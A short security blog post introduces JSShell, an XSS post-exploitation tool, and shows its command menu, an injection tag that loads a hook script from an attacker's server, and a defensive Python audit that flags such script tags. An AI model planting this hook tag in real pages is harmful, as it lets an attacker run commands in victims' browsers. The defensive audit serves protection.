JSShell is an XSS post-exploitation tool; in short, you can think of it as a command-line version of BeEF.
https://github.com/Den1al/JSShell
 ╦╔═╗┌─┐┬ ┬┌─┐┬  ┬
 ║╚═╗└─┐├─┤├┤ │  │
╚╝╚═╝└─┘┴ ┴└─┘┴─┘┴─┘ 2.0
by @Daniel_Abeles

>> help

Documented commands (type help <topic>):

General Commands
--------------------------------------------------------------------------------
edit      Edit a file in a text editor
help      List available commands or provide detailed help for a specific command
history   View, run, edit, save, or clear previously entered commands
ipy       Enter an interactive IPython shell
py        Invoke Python command or shell
quit      Exit this application

Shell Based Operations
--------------------------------------------------------------------------------
back      Un-select the current selected client
clients   List and control the clients that have registered to our system
commands  Show the executed commands on the selected client
dump      Dumps a command to the disk
execute   Execute commands on the selected client
select    Select a client as the current client

>>
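There is rarely a reason to use it during analysis, but it looks good for additional impact testing or as a toy to play with. As with other XSS post-exploitation tools, you start the server and insert the path below (/content/js) so that the rest of the processing logic gets loaded.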
<script src="http://192.168.0.14/content/js"></script>
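A defensive check for the hook tag above, as an added example that is not from the original post or the JSShell project: it parses a page's HTML and reports `<script src>` elements served by hosts outside an allowlist, noting the traits of the tag shown here (IP-literal host, plain HTTP, the /content/js path). The page URL, the allowlist and the sample HTML are constructed assumptions.

```python
import ipaddress
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit
# Constructed sample page; only the last tag is the one shown in the post.
SAMPLE_HTML = """<script src="/static/app.js"></script>
<script src="https://cdn.example/lib.min.js"></script>
<p>comment text</p><script src="http://192.168.0.14/content/js"></script>"""

class ScriptSrcCollector(HTMLParser):
    """Collect the src attribute of every <script> element."""
    def __init__(self):
        super().__init__()
        self.sources = []
    def handle_starttag(self, tag, attrs):
        if tag == "script":
            src = dict(attrs).get("src")
            if src:
                self.sources.append(src.strip())

def is_ip_literal(host):
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False

def audit_scripts(html, page_url, allowed_hosts):
    """Return (url, reasons) for each script served by a host outside the allowlist."""
    collector = ScriptSrcCollector()
    collector.feed(html)
    page = urlsplit(page_url)
    findings = []
    for src in collector.sources:
        parts = urlsplit(urljoin(page_url, src))  # resolve relative src values
        host = (parts.hostname or "").lower()
        if host == page.hostname or host in allowed_hosts:
            continue  # same-origin or explicitly trusted
        reasons = ["host not in allowlist"]
        if is_ip_literal(host):
            reasons.append("IP-literal host")
        if parts.scheme == "http" and page.scheme == "https":
            reasons.append("plain HTTP on HTTPS page")
        if parts.path.rstrip("/") == "/content/js":
            reasons.append("path matches /content/js")
        findings.append((parts.geturl(), reasons))
    return findings

if __name__ == "__main__":
    print(audit_scripts(SAMPLE_HTML, "https://shop.example/", {"cdn.example"}))
```

The same allowlist expressed as a Content-Security-Policy `script-src` directive would stop the browser from loading the tag in the first place; the audit is for pages already stored or rendered.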
HAHWUL | Security engineer, Gopher and H4cker!